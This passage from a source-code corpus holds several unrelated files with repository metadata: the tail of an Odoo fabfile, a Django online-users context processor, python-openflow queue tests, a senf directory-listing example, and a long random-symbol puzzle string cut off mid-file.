env.odoo_modules = modules.split(":")
client = get_odoo_client()
try:
client.upgrade(*env.odoo_modules)
except xmlrpclib.Fault, e:
print colors.red("XMLRPC ERROR")
print colors.yellow(e.faultCode)
print colors.yellow(e.faultString)
# EOF
|
nexiles/odoo.wochenbericht
|
fabfile.py
|
Python
|
mit
| 4,380
|
# -*- coding: utf-8 -*-
from datetime import datetime
from django.contrib.auth.models import User
from django.core.cache import cache
from useractivity.utils import get_online_users
def online_users(request):
"""Returns context variable with a set of users online."""
if request.user.is_authenticated():
return {"ONLINE_USERS": get_online_users()}
return {}
|
turian/django-instantmessage
|
pinax-im-dist/apps/useractivity/context_processors.py
|
Python
|
mit
| 380
|
"""Test of v0x04 queue module."""
from pyof.v0x04.common.queue import (
PacketQueue, QueuePropExperimenter, QueuePropHeader, QueuePropMaxRate,
QueuePropMinRate)
from tests.unit.test_struct import TestStruct
class TestPacketQueue(TestStruct):
"""Packet Queue structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'packet_queue')
super().set_raw_dump_object(PacketQueue)
super().set_minimum_size(16)
class TestQueuePropExperimenter(TestStruct):
"""QueuePropExperimenter tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_experimenter')
super().set_raw_dump_object(QueuePropExperimenter)
super().set_minimum_size(16)
class TestQueuePropHeader(TestStruct):
"""QueuePropHeader structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_header')
super().set_raw_dump_object(QueuePropHeader)
super().set_minimum_size(8)
class TestQueuePropMaxRate(TestStruct):
"""QueuePropMaxRate structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_max_rate')
super().set_raw_dump_object(QueuePropMaxRate)
super().set_minimum_size(16)
class TestQueuePropMinRate(TestStruct):
"""QueuePropMinRate structure tests (also those in :class:`.TestDump`)."""
@classmethod
def setUpClass(cls):
"""Configure raw file and its object in parent class (TestDump)."""
super().setUpClass()
super().set_raw_dump_file('v0x04', 'queue_prop_min_rate')
super().set_raw_dump_object(QueuePropMinRate)
super().set_minimum_size(16)
|
kytos/python-openflow
|
tests/unit/v0x04/test_common/test_queue.py
|
Python
|
mit
| 2,327
|
# -*- coding: utf-8 -*-
# Copyright 2016 Christoph Reiter
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
import os
import sys
import time
import senf
def main(argv):
dir_ = argv[1]
for entry in sorted(os.listdir(dir_)):
path = os.path.join(dir_, entry)
size = os.path.getsize(path)
mtime = os.path.getmtime(path)
mtime_format = time.strftime("%b %d %H:%M", time.localtime(mtime))
reset = '\033[0m'
if os.path.isdir(path):
color = '\033[1;94m'
elif os.access(path, os.X_OK):
color = '\033[1;92m'
else:
color = ''
if not senf.supports_ansi_escape_codes(sys.stdout.fileno()):
reset = color = ''
senf.print_("%6d %13s %s%s%s" % (size, mtime_format, color,
entry, reset))
if __name__ == "__main__":
main(senf.argv)
|
quodlibet/senf
|
examples/ls.py
|
Python
|
mit
| 1,435
|
mess = """
%%$@_$^__#)^)&!_+]!*@&^}@[@%]()%+$&[(_@%+%$*^@$^!+]!&_#)_*}{}}!}_]$[%}@[{_@#_^{*
@##&{#&{&)*%(]{{([*}@[@&]+!!*{)!}{%+{))])[!^})+)$]#{*+^((@^@}$[**$&^{$!@#$%)!@(&
+^!{%_$&@^!}$_${)$_#)!({@!)(^}!*^&!$%_&&}&_#&@{)]{+)%*{&*%*&@%$+]!*__(#!*){%&@++
!_)^$&&%#+)}!@!)&^}**#!_$([$!$}#*^}$+&#[{*{}{((#$]{[$[$$()_#}!@}^@_&%^*!){*^^_$^
]@}#%[%!^[^_})+@&}{@*!(@$%$^)}[_!}(*}#}#___}!](@_{{(*#%!%%+*)^+#%}$+_]#}%!**#!^_
)@)$%%^{_%!@(&{!}$_$[)*!^&{}*#{!)@})!*{^&[&$#@)*@#@_@^_#*!@_#})+[^&!@*}^){%%{&#@
@{%(&{+(#^{@{)%_$[+}]$]^{^#(*}%)@$@}(#{_&]#%#]{_*({(])$%[!}#@@&_)([*]}$}&${^}@(%
(%[@%!}%*$}(*@)}){+@(%@*$&]*^*}*]&$[}*]%]+*}^!}*$^^_()#$^]++@__){&&+((#%+(&+){)$
%&&#($[[+##*%${)_!+{_[})%++)$#))]]]$]@]@($+{&%&%+!!!@]_]+])^*@$(@#${}}#}{%}#+{(@
#__+{{]${]!{(%${%%^)(_*_@+)$]$#_@$)]](}{}$(}*%+!}#+)$%$}+#@*&^{##}+@(%[*@_}{(^]^
+_*{@+[$!!@%$+{_&(#^(([&[][[&@#+}_]&&]}^*&$&)#_^$@$((%)}+{}$#+{+^}&[#[#_+${#[#]{
(@@[%}[}$%+*#$+[%(**!$+@$@&+$_$#!_&&&&{***+)}][}#^!%#&$*)$!%}*&#}}##(^_%^]{+]&&]
}^]#^(}@]&$]*_][])$]{_+})^_}]))()^&)(!*![!&}{][(]})[(*^}$&$_@^$)#${%[$_]!^]}}}*+
*^_(+}^)(%(}{&)[}!$$&&+}&[{%}^+#$]@)^&*%{@}]&!%*%$*&][}&{$&*@{@#]$*_[]%%[#]#*%)@
$_^#%$!{#]^$}%^@^+{($!^($%)]+&}+$@[$*)*&)*%!_!!+@&^*{}%#&{}$!(*^*@]@@})[($!)]]})
})(&+##]##%&##$}@{#_])*%(*(@$)}[+(+_)!{{#^{_@)!&)$}@^^^[$#__+$^!*#%%]_!#$]$&+^}%
@])])%}]#$((^+{{@++^])$^*#[$}*]}}{)@+)[_}*@^%#]]#+()+)(]_[!!!)+)$+&@@])!}+*%]$[]
&&[@+$_&#[$!$${}{%[]#+@)*!#)*!{$#*$%}[(&@$&_@($$]]]_[+(#@}&_}+]@$#_+](}^})!@@}@)
}^]^]*}]+&(@@!!](*@#(++*)]!(^$})&_^@+]{#_@*%^[$[%&_%@%_![&&]&_@*#_}[{{])^$[_$_&_
@%%[@#[@_[&+]}[+)!_#_+++%)[@%$(&$[{#@(}$*![#^#{}_)[$^_$${_@&}*![#*#_+%[@{*^$){)#
#%}]{+((*^]+{})&#$!#(*%({_!^*[{%@_&#){![&]@$#[#(!{*#^*%)]!%(#]%${*_^{+}(@}{_^(](
_+!_)^&}!#([(+&[@])[_(]@]@&@{#@(%[@+[^@%@+]*_[{]$[_(_@[!]]^%+@#(@$}]@(^**+]%^)^(
@}^[]@@[@[@}^(^!]%*_]&$!!^^#*[#*[*_}+[$#(_#%@](+[^+}%{_*#]+*(]}!$(%@%#^)}]_&]{${
}$[*{+&+&}[#_#}_(}){^#{[_%*!$+[#)%]@&&_{)#[+*&+#!&)%)%++$_}){%%*@!*&%__(_!]#$*(_
$^!@@}_())%(&$%]]{{{@+!&%@(^!+*{%[*[!]){(#$@)(^{]%[&*(&!{&}!%*$)*]]$%(__[}_+&)!(
^_&*]*+#@{@[_({$*&}][(*!+$+#%&![%^)^#(#}+*+(@)&&!({^^_*($^+)&{)%$@%)&!$$&&^+#[)$
+!$^]*!%^_$}$+!!&%_&){$%{((&^{{(&_&_]{^}@[$^+]}]^{@!^@_%_{^@*)+^*#$#!+*}#)}@(}!]
_*)}$**@}[^_&*^)*+#()]&{{]*+#${@&}#)$[]_+(^_@^][]_)*^*+_!{&$##]((](}}{[!$#_{&{){
*_{^}$#!+]{[^&++*#!]*)]%$!{#^&%(%^*}@^+__])_$@_^#[{{})}$*]#%]{}{][@^!@)_[}{())%)
())&#@*[#}+#^}#%!![#&*}^{^(({+#*[!{!}){(!*@!+@[_(*^+*]$]+@+*_##)&)^(@$^]e@][#&)(
%%{})+^$))[{))}&$(^+{&(#%*@&*(^&{}+!}_!^($}!(}_@@++$)(%}{!{_]%}$!){%^%%@^%&#([+[
_+%){{}(#_}&{&++!@_)(_+}%_#+]&^)+]_[@]+$!+{@}$^!&)#%#^&+$@[+&+{^{*[@]#!{_*[)(#[[
]*!*}}*_(+&%{&#$&+*_]#+#]!&*@}$%)!})@&)*}#(@}!^(]^@}]#&%)![^!$*)&_]^%{{}(!)_&{_{
+[_*+}]$_[#@_^]*^*#@{&%})*{&**}}}!_!+{&^)__)@_#$#%{+)^!{}^@[$+^}&(%%)&!+^_^#}^({
*%]&@{]++}@$$)}#]{)!+@[^)!#[%@^!!+{(@&+++_{!$}{]_%_#^#%&{!_(#$%%&@[})]+_@!(*[_@[
*_&+][^][}^@}])!(&^*[_%+(}!!{!!^*@!({%]#[_&()$]!$]@}*][)#()})[*^[^}]#(((_^#%%]@}
^###%!{(@+]$%*^}(![$@*]_{#*!$*@%*(^+#!)$&]*%$&*@$[)_$!&+_[$)%_*((%+##*]@+#*[$$)^
@)]}!)$^%+%&_#+]&&_!(}+^*#)$%%^+&%^_]@*%^^_#]%{%[&(*_(%(*{^@[@&+!@&[+[++$})$!*}+
(_^%%*}^{+}(+]]_][_(@}^#_{_}*){*)}+*)%#%++}{}__%$$$[%%*})_#*!_!%&*$!]!}{*+{^()$}
*$%*$]][{@+*]_*&!^]_*!_{_@(}+%#$+@}_]#@$#^%((#$%+++]])#*@)&([^#]_$%$)[#)){({%@_^
@#}@*!!()[]%$*+*{*$%@**!}&#[*#[[{(@&_){{!}!)++@*{{({_!#^]}+{{#]{$^)&]%}})^@&$%@$
$!_+!{]*^_+@&@){#*!_#+{[@$^(__}*[^$&{&]!(&+++_@+)&}))$%]${+*!(#@(}&&&!)!_!$&@&{[
[@!#!]]#%)(_^!{*[{^{]})$)^&(*)%}#]#()^#+}!{_}*+{@&_^)+%@!%%${$&%}(%*_!)%$((+$&^^
}#[@%+)&^!](]%+_{{]}@]+^]{(!_*&@][]@_%}%(%&)})&!#)[_]^+$)[(%*%({]$[(#+&+[@[*([$#
^*!@{]]#![[{_]#^@])_[[+%]#[%[+_{)^+([^}[]_[}])*^!_+$}^+_)+*@$$^}(&[)_^[+})^]&)))
}*+}%){@_)]_)&)!@)*#^_%{}(]]$)+^@+}+$_*&)]%^@&)![!@$[@)@}%!)@$((^![{(%([+#&{$+#[
#&)!+{)__]+%)#@)]*%#]*{)$@*!^#[]**+]&])$@*@]{$_+]]^_*+*+)%!_!}#}^@*[
$[##&_^+&)((_$#!]}[_*]_$^_*{[^$#[{@$[()+*@_$((+}*^!]){][_}!)%{}{&#@[&#$(}#}%%{!_
@)[($}&+&$}}%[)@[{^_+%+[)[^[*{{^#]*__$^%^}#]}*{^+{!@#(+*]$)^(*!^^]^)[}@{%(($(+_#
*){@}]+}&)[(^^(*$&_$@#[#_$)^_()}{[]]{^@*)_!{@)(!))^_+_]{+_}$%(@#+{*+%@!${*&&@${]
(}&($(^*{^$])*}$(#}%}#)_@^*}#!)$)&$*__+!!+[&}])*_{+$}!@)*^{{({@}{@}+@#${$^*@^^}(
[)!^){!+@%(^_)[]@(]+&^_@[*(_@^*##*&*$!{^{!&#@(%&(@!]^[]({!+(]+^}&&${{]^!+#^*#&%{
$[}@&(]^&^@*#[&&}^[!%+#(+(%+&){_@_&%&!$}&)[$]%_^]*@^]&_}&^^^(&(${%#^(#[}}{%))&}{
%&___*&*((!#&(^)}%**$+_[!#{&_{$_))[${$*([&*%^!$%%&}$&_))}{(_]!+{}@+%{^*_[[@@)%}%
@)%*(}($$)^!#}+}#$]@})+]&@^!*{@_**{_^{@(^(@++&)!#](&#*[)+!!%{]_*$*(]%+&_^%)$$$*$
&]@}!&{@[{(+**#)}${[*@$(+%__{{}#!}@(%^+*)$+&){^(_*&}&__]^*)}]^!!%&$#[)$)+_{!$%@)
_##)#^*%#}{$}$[!!__$)}(%+[^(^$(%_)#!$[$@+]${$({)[^$+&$($]*!+$^{_(_%}(^)(!_))![*^
^%^&})[@#}#_%$*}&#!_)!)){*}!@&]*(@^_&[)]!*$&_[@&]($}!]!{)[)[{{_{#(+_!_#{]_(_(${}
%*+[}#{)@]&@($+&!^[}![}&$}*^[!)#^_#**${+(!+!#)!^%_#%[][(@(!!}&)_*{%@_^!)_!_@!^!(
{^](#%%&@#))$&#_&[[#&^&^}))([]&^+^@($!}{+^+*{%[}_*+_*^+$)+%^(}&[_%)$+{}{[*]+$]}&
@}_]_[%&)[@+}{+&^!#@_{!__!^%[(]@!+*%[!+)!{+_]*&+@*[_(*%+}*@+@&$!+_@+*&[#@%###}^^
%_@)$[&){&#&$!&}{@&&*[&!!!({)&{)+]^*&)]+[+^%^[_&+^$!$!+!+_(}+^}+&#*_&*(+_+[[)$!}
^$]}%](]]#_}[(&${{+((][_*%!)(##[@*&(^!_]**}[}{[%]*!$])[_))&(^$)%))&(+^@$&${_@![!
#(}_{$(&_&[_]%*&*@]}]}[{!&*}{{&+*$@%%}$+^[}{&$^%%^]#%{#](_){[()@@)[@]!#!%)&*+]_}
}[([#}[}&&}+{@!@+}]){_)%_+({{!]*}}^(!])#*^)(#&!)_#$[%_#{!##%%+)@{**)%+&*[*#[+*$)
@(!%)*)^]![_^%#)}*#!_@_@)(#)(_(]!%@)!_+_)]!*@{&!^%_+*(%%$!!_^}@^^{[@#*&+[(%#[{({
+)&+_$!${]+}^$[!]_#{{#]!{[&[$@*^]}@]}+{)_#}@_^%%$^{+($*[###@))]}@!@]]{^[_@)!@{@}
*+^(_]*$!_^_+[#))$$]*+%}{[&([&)@#{#)*%)])!_^+%%*#(+!}+{[#+#%%]@((]!_#@*%&(@[(@@#
^#}@}[*@})&$)@#+*!}^^()[^#^])+$$*%^*@^^!^$^#_!@^^(_&&][)@(%([[]&]]{[^}!@^[+${*%#
{[!({&_(_!+$]@}@!))$[[+#+{(@&@^{]]*][]}_$$$)##&&^#_{}}#[*%(+&]@%{@)!&{+{*^_#_$*^
[]}+^+*{[)}![}@[#$)}_^}#$!#%{([*_^+!#}$@{{&)!#*$#*@&)@&]^}!+{!}{)%}^[}]}[$&)^$)$
+){@)%$*[$_#))[({)&()[_^&^+#}%#((+@@[$+!^[%*_{]*+)}#$${+!@_)@@)@%**]_]))$$^&**!_
{!]^*+#]$!@+!$)^%)!&[$*[@!(_)[![)(}$}*)$(&%%&+^}+^%%&^_}]!(&]#+$*__*))#*{_&*]{*@
}_{%]]$)(#@![!(_]!)+&$&^(){$%_(_%+}%*%&%!!^^)(_*@{^#())[{^&@}#{{^_$[*()*$&%^_{)%
#@#{%]_{%#^)@(]#]}})#)*%)[{_^%[}][]^]^**]]}]@+%_}(])#+*^&]$^[$$%]$&+({!^{^@+]{(}
&^$@[$#(&+_%{*+%%(][%*+*{[)*$#%{({#@]_(#[{*(*$}{$^}[]{%]&{@#@^]{[)({%[)%!*$$}@&&
_+&_}@!^$}!$@_+^^]}@}%}%#+&($)]*+[%^#*@+_[((#!}%[+])[}[^)!(&*^}*+]){$#&}&*{)%^&!
]@][(&@)#{#_*^[@]$[(]{()*}$[}*{^]&]$!%)*!}}()^^(]+*!]^*[^&+$({]%!@)]^#$(^{@^!(}]
&*^_(+_&++_]])&]#%@^#%$^^_[+[&*[*^^}_**!}*}_%&([%^$%_$]]](_@$*%!)({&##([&%((}$*%
]*_${+(#^+^*!@@@![&&!}$)]%^@)#%_]&(])_@+{*#(}*_(!(}$[(_^_^]_}!&_&()(@+&_*^+)}#}[
+[[%){#[#()#_$(]!(^]{@(_%}$[))}*)(]@@#+@[+$[))[%*#%@}*_$)*@@@}{&^#@!}{+{^&))+}#]
%{%{&#(*]$}}{}&]$*%(}]{#*(+#%(@]&[^!{&}(^*[@)$^!^+$*]&])@##@*+![&+%_{+_)[[)+)(#_
&{^#}!!]_]}}}][@{^[%{*+!!!(&*$@^!_)^*$^@][+[{&#%!!_^$&{(_(^!}*@%([@^{%^%(+()(+%^
])*_)^$}_}}*{[[*{+[+*@%}!%#%%$!]]}}(^@@^!*)%^+(+!}!#$_&}_}_*#^&^)[(&^&}#$*}*#}*^
&{%{[}!{_$_[]^&%}})!}]%$+@!@(%)@[}%_@]]%!+$*_)%}#$[&_])}][@%[^_$#$((%]+})%#$)]@#
]@(!@#)[{$@^!]{#^&+)[**[}%#)+(%]#*$*&}}_%%]]&!&$[)]@{+@*#_!{@{#{_$%[!+&$[}+((_]}
^}[[+![})&+^&@_){(&_^&&]#&&))@@%[{%$+%})!_&[[$}&_@[+%}&*]$)}$]&^@{^})))_#@*@{([+
+%}^{]{]]]+}${$!^)]#()}#{_^+__&#*^&+{!{&}&&@{#&(_%#^*#+_${}!]##]*[(%])[{(+!((}&]
)!(}##{+%#_[%([}*}]!_(!^[{[}^{@*(}{@+&$)$){!^@]{](@{)#[_!*_*[#!$@)!}@}]_}[*#(}@#
%@^}&[^]$^(%(&&+!{^!)!#%{[^&+@[+*!])}^])+[&[)}!}{$)}!)^#)^+}+${][!%_%$%&%$)){*_&
*+@!}+${()}{(&$^_)&+#{)[^$*[!$]_$%)]^]@[$!#%((_&&[%]!}$%$$[$*}$(*(+&!#^^#][*{(^$
]{!(}#])#%{&!)+(({#{#*_+{[%[!#&%*])_&*)_}+@{&}#*&#[(!&]]*)#%](#^^&%]@(*]+^{@{#!*
](%$()%!]+}_([](@[^&@{][%])*]{^@@{#$*{!^#)$&!)!%_}&[(*#[[&^_&!_&!@#_$*__@{_#%&#}
@@+[+&%&$[%[@@(@!_&&%#__!@{$#&@[*($]*](&&{}#!^^$[%&{+%}]_}!#([}^{{**@*($[[#[%}*#
*^^[%)%@[&%}!+&!}*&*!)_$[^^#]$$}@(*)&)}@}^+@@!!}&%[]*#$}+}+#!&+}]&&#^))(*_][@!*{
!}*#^()_^*+((&+($]!!$){@$#$}*][]]&}(^{{]_]+^$+)[^##)})@^+$[[%[(_+@$$*#&%%_]+}[!$
@])(]){)#_$_)[$!({@#$#^#_&^(_%(*}^%$]+$%&%{{!{]}]$*@_&%(&&{)*]^}&}^&[@)++]!(#[([
@^#^$&}#)}#*@)*#&[^]{)#*@(%(%[$}!{$}_}#(_}#^^+[(#]_}#}__&^{{@$+^!#}}[#{!+#&_^!_$
+)]#%*{+((*_+_]+{]*)#*]*_!+_*$(!^%%#%*%^$%{*@@[+[((*(!([}_]}@^^+(_)@{[({_^]^)@&!
!+]^]#%]^!{(!#){_!![({)+@{&^}*[}%}(}%_%*&]+*)_!#+{^)$##_]*}@$^#()]*)@%}[^_)!%++!
_(#(&}#@%!)]$#^@&]%[[#!)(}){}}([)+%}@[![^%_**@[]@%]*)])$+_[%]#@!$^]&}*!(}(^}+)(%
})!{^^)#+%%#[^!{{&#_}^*^@@}#}$(!&#((_*_]_)$[(%}[+^(@}{+{}][#^_{]]^)!##$#&!@@%@%}
}_!@[##$@%)}&+!!@#&}$[]+%+({()@+}]#+%_#_{$_^}^}!&[^*^[&@@@^*[@}{+[[%^+]{@@}&+]](
*$**&+{%$@[%^]+#@]}@[*%*]]@*!*%[^+(&_!{[%)}}]&$^[[+_[%@!!}_@!])*@^+*&+&!#(*]!}%(
^![%$&[+*#]}&$}&_%^&}*!*^&_[@&#{^%]$^[*#]^@{#%)%{)@{)*]]!]@((![[(($$[%{(!#^^%!__
{^*!*%^[}&]_}#]{_(_&((([(]!}@(]^!+]#+!&}_@}@_)$$)}()]{_(&}(%%^}_^+[+[$}[__{(*$+^
!%${[&{@#%}^#_*$^+%&+{%)]^%##+{^@$[&_{++)_@_}#[[(_+!{&@[!%@*{_*][$$$###[!}%%&@(!
@+}{{$#%^(#@&(!!_]*$[#(&)^&$$%#{{#_*^{}@&{*@$!_(+*@]@$(+}+@%}*+]()_&_(]%)@]{(_#_
$*@]%($}}*}$}[$(!+(&@+]!#+{@@%%[[)#(+]{}+%@%+_+*+{#&(]$}})^!*%_][@{{!@)&%{@$^}!(
}&]&&[*^@#}&++#{]%*^@%)}@)]+(_^!}*^]_@#__#^#[&]&%]{_(_{)}&}}(_{}+(]&{^))}${}%]_]
%)[*+_[)^]+(+{#&_([^)^}!_*}#}^]}^]}^@&($@[!&#]{$%$}_#(^^[%@]%_}]+%&&%$}]){@}}]{@
]!%_$}&#]&+_](*_(*)*][]%%$#+!!^((})+{}%]@@_+}&_&[{]}**^$^)[&}]^%$_#{}%)]+!%@!*)}
!!{[{*!+_^+[&(_&@{]@+]{%_+%%+][*]*}{^](%*)_]!$#]#@%}!+&][!@%[$((}@[[#&{!^)%#&+*+
*#*{@)^[{_][{]!*$[#@^+#{)#%_^&*{){+[^(!^%$(&$&[{(^!%)]^{]%}}%}#)(#}#{_}!$$**{%#)
+}***@+[!)@{[+^[+[##}*%$[!!%_!!@[#@#@&#![%]@())_}!##%+#{}#(+_&{}!%_@)^}++^*!%)!_
{($#[#+_%}^)_^!#%*&#[_#_)_[#+&%_!*{[!**@}($!+(!__(^}%#{)^%}[)[){^!*{@}]!+{]){]*_
_[{!_%[!#^*[{#[!}{!($%+^$]]{]*)&@&#&+(}!*&])[%()*]}^_+@[^+%*]%^!${@*[{])}){}^$(_
!(+]{%(((&+!*%@[#*}^)_(@+*@*&(){{@}+]]+^*)({{%#})&(*$]{&$#_{{{[@](*$[!%!@%!*&!+&
^@[_&$&[_*&^}+__&%[#+#+})[+#!$*#^}[#&*}(+(]+!*]*(+(^_#_+^%]]@!][@%!+{{_%_*$!@{!^
$^%**@$[$^]@%+%__*}+$)*(*]{[$](]#)!)#@}_]+**)@!%##*^#(!*!+}^{!){}$^@_^!_%$}*&[#}
*^**{%*#@!}#+%@[&##]]%+$*@[+&%@){$%{}}$^]}&**%$(^%%@[$&)_}*)*(#_#%_+@%)]*{{!{{*}
$^(_*$_$&&%](_@}]&(&}@$+]_%+@!++_*@*@%&[*%]@{)#%_]@_@&{#!%]+^^$*{]#@[+[)^)&%{@$&
#++$+!#{([%%+)}+}_+$){{#++&%((^^@%!}^&^$($#%}+$}([]][@^_@}##&_)$##[{{@)%{+*}]{&^
)$%!#}@!*_[_%!^+[)}!#{}{)*]!@#)%{&*#(&_[$)&)@[_+][(${%%((}#+[)!+[*@+$$[^$[!]_!#&
&)^^@@[*^^_%_@*#$!}_&**}@_@__%_$*}^][(($$[(*%)}+*$((}${@^$_)$#@]!(}{^}]!%%!}}^#(
}!_($(^%^]}][{(^]@+{+%}+]!{%}%!@}&[}[&&^+!#$)]_{#$[]_@}_$${^%^^($%*]}$*_]^{%+$$_
[!+@@)^]_&&[{)+@!%[)+^![_))&_^!(^$((!_}@$+)!@]!]+${#_@^@@+_*$([##)@^^*#[]@$}^@){
*})($_()()[*!!@#(&&}]{]+{[*+}%_$(@(}&{]*$!$]_]+&!%+{}$}+_**!@]_+(&[$}__@&[!}{#&_
)(}(+(&#$($$@$)){&*#($]&(@{+*+@)}+(_]()^)}@$^&]+}#**+(%+]_*]+}_}$%]%)]}{[$*&{$_^
()(]]#^*)#(*_^}}_(*!&{@%($+[](*$+}_!))*$#@@^!#*$**%!!)+@+%!^)_[}{*@{(_^#}}+_}))[
]&[]{{](}*#^%(!@%$@)&})+#[@[(}%+&)_*}#!)+]*&}+%](++**]!(([#[$*])}{{!+_*])$${!]&%
[%]@@++#$@^_^[(+)@%_^_%+^^^*![@{+%_{[(([]@][)&^^*#&[@*^+}&$+@*_!!^}{)&_!!$]@^))]
+^]+^}&@@$!${*([}}{&{}_&]#&)!{*#}_*]_{@%}_]%#%@**}$[#%*%([$#+)^(*^^#)%}[)!+[}])[
[{)_[)*@_#*($(%${[)$[%^@+%&!}]_&(^()#()_{_&_&*&[}+!$^$!]++*}])$$]!}[+@%{!]*^}(%]
&+!]]!&^{(*+[!&]$%%_#&]+}*$_%!#&^]*!*($_@+#(#&&)#)&+![%[^{^%&}@{(&#^^^&&#@]{!!@^
{@(*_{*[}+${(!$]%![*}!#*%&)^&&@#{#&^{)#@_(%&}^[!@_^+__{_{){$_)&#(}(*+)%[)@+)}[}#
[%[!*@$${[&^[&@%&]%#+_}%##%${$)]}@&&)_)*#%#${_+}+{*^{{{$&$^[@%[[]$@]%}#$)_[^!__]
$*]&[[+([&{!}}}%[{}#@}!!}^_(}@{{$_##%}{]][!!@^[&)#*(%^_!!%^*_][_%}^%}[}]}()]}_%)
!@_}^{*!$)@){#)_*{}@&]&(@()!&!#%_(]^[@$*{{{[#)*@%!@}^}+%^$!]+}$*(_&}}{(+)%(&{!!_
(%$#!^%{[)##^]**@+]*+]_&#{{&%^&#%)^#}^)*$*&)[]**!#^*@(^*^{[$$$+$+}+[%&*%[_]^#@$(
@)*}*}(+#%{^(+@&!@%^#$&^}&}&}%{#}+!)!^}#{^_}_(%&(#_$+!%+$*@#)%#{}(($!&^%&}+&@%]!
%&*&)*$!##)%[&)(_)&}*{%{]@[#[$@^]&*&@{+{){*^^)@}$%#&)%^)@+##_]$@_{{}({+$#{[@_}()
^+@])!%}%^[)^)[(_$^@{**{(^%_[^{$)&*$^{^#%@)](}!^_#_[)!_%{[%]{#&*(^^[[{(+}^%+##]@
+^_$@{^+_{[+^#@)&+%_+)[^}}*{$)![#][!^@{}&[^]&@}@{%+@}{+([{(](}&%}%+&^]+(}{][_[&@
#_#^$$[!%}#@[@+&%&*(&&[}@)^!@[@&{*&{[{@+%)$!#!!]{@(@@&+)++&_+)[_(@{&[_@&&#})%[+@
^[${+![}[&][)(@+[+*+#{*!(^&()&#_^(%@]]&(+^)](&^]@@)%[@#*[_}$$]*][@(())#)@%*{&{!+
_[(^$@!+**!!*!#*]$*]@{%{$*$]*{#%)*^})*$[{$&^(^@)%!_!}({@#)%&$(+(^{+[%}++#]{[((^@
&])(^+$%@+$&)](](^]@^^]}%[%[**#^_$+$!_[{}#_{)]!$@]@$}+(]_}^#{%#$(!%+&*!_&%!@]*^^
($&*#*&){+@{$#@[()[*!{}_)!&$%%^@!%!&@$!&^$_}!]&!]+[_*(^)_^]}**}&%)}[&#&[[)$]!&({
}#@]_#@}@$#__%#}*}{++![#[}[+@($()){#^)(#$!^!&@}@*@{{+#(}@+^$[&&%!{_${$#@])&_[]#)
]@)+##@]^@}@[&#%_!*@]#]$+&+[%+!*}*+}_}]*^#+^#}!)#!}&#%({@[{#@$!)@!)!+%$&{[{(_$$!
(})$]{}^+_%(*]*&&))[])+(+]}@*%!%{]%@*%$_#)%(&(&%!#(&^_*&*&#]{]^][!(%&}(@&{[[]+$)
&%(*@@#+!_[}&^$)}%[$%([$)!##{@))^_}_{*@+^)[&}]*@^{*^(#!(&^@{)*$&{(]**$*+)%$($!@!
[*]!]_*%[]#__+_}}__)[{$!&&({)[#{#_&()$@{)+)#+}#&{^^{#^##_*&#}*+*%&}%@]_!}}!#**&%
$&@{$*]%[!@*&%+%&&)#_+!_&^^%+${!+++)+$#@[$)+%%!{#(&{]&){!&@$*#%&}[+^{!#+$}++$#(}
#%$(%$&#@$!))*#!_]#^@%%&!*}!)%+&@+*$#_[__^[%+(*!*)^&))(_(%&{}#%&[)+_]{#+&!#]](%!
($@&^}_@^+%$($_${$[+@]#*#[}]&#!!{&@!&@(!&#{[+]#*)@)[&[}))^[[@#!*}+(&)(*_*%%#!(]_
!_&!&_{[)%@{_){_{**!@[[$]__^([)^++_+{+^_&!&$}![#}$$]]@[(_)^}_(&+_]{&}}}{_[][##+#
{@^{+)_*%}@%*(_{^+&)[]&{*(}]]$}}^@$!&[^@@^__]}[^[((@*+%_%%@])&{^_&$]#)!+!_}{[(&(
#}{&^){{!#(+#!}[)+}]$+^{)#!_%_[@}(]}%}#&&!][[%@}^]@))+!))]#!+]*[)]_]*{][$!+*@{#{
&)&&^+_*!}!%({)}^)))$[&_%@#]]!]@)&$(^{@&@[^_#)@@+#%(]&)+!){$]}]){_{}@#%%*%#!)[]_
_[#@@$}}{^&&$^_{}%]{]&#(@_!]%_)^$$!#*@##^!($+*&$+&__@***][!@$]$)*$^[}$^&{}([+{}&
_[$[&&*#@[[@&{_$%!{)[)&[^[+^^^{#$&$_*{*^&)(+(&$}^)%+(#[%*#[*[([+[]${&({%@!](&]*[
+_^[^[#&)^[@$*+@@[!}&){}{^+@[)^&*$]]%^_!^$+%&)_}}([{$$_][(*]$&]]{^)&(^#[]%*%&}}#
+*[[@)_{}&%}_+#)!^{(}*^[@)}@(+[#+#*{$)&_!}[#[*+)!#%{%*)#@++&^]$[$&#$@}}_)*&]))#^
({^(](}+#&[][%+]}^(#^*+&[{{$_$$@^(!%#^*{()%&$))#]{(@%*}}))@+^&)+%$^)&[(]{}^]}}*+
^%&@)!_[${!)&%#)^*)#{)})@*_]){{{[$@$#{!@}_^{{!_$&$]+[[[))_]@)[{#)$_*(}*]#$#%@+]@
$(^_[[^}^&%+)([#_!*})%%)%)^!#%)]&!@^}#_!)[*@*[{!(_}{{^^}
]@*{*)!!(@+]__*@$[}&($[)#{*[}(@@%!}%[{$]&^%)@&(@][+{}*{%++}$&+!&[^^%]+%_(_!#)++(
]+)($[#]@(#$+%]+$!^_&}+[!$)][)(}((+!@{^^^*{[#$_@}$!@%{(]{+^(!$*!@@*}^+*!]])$!)*[
^%[(&[{#@}*!*$_#@@+{_&&$@(#*_]#@$}[_)*][$][_!_(_++$+)$_}^++_]$+(*+!%[}}*_^}({&[_
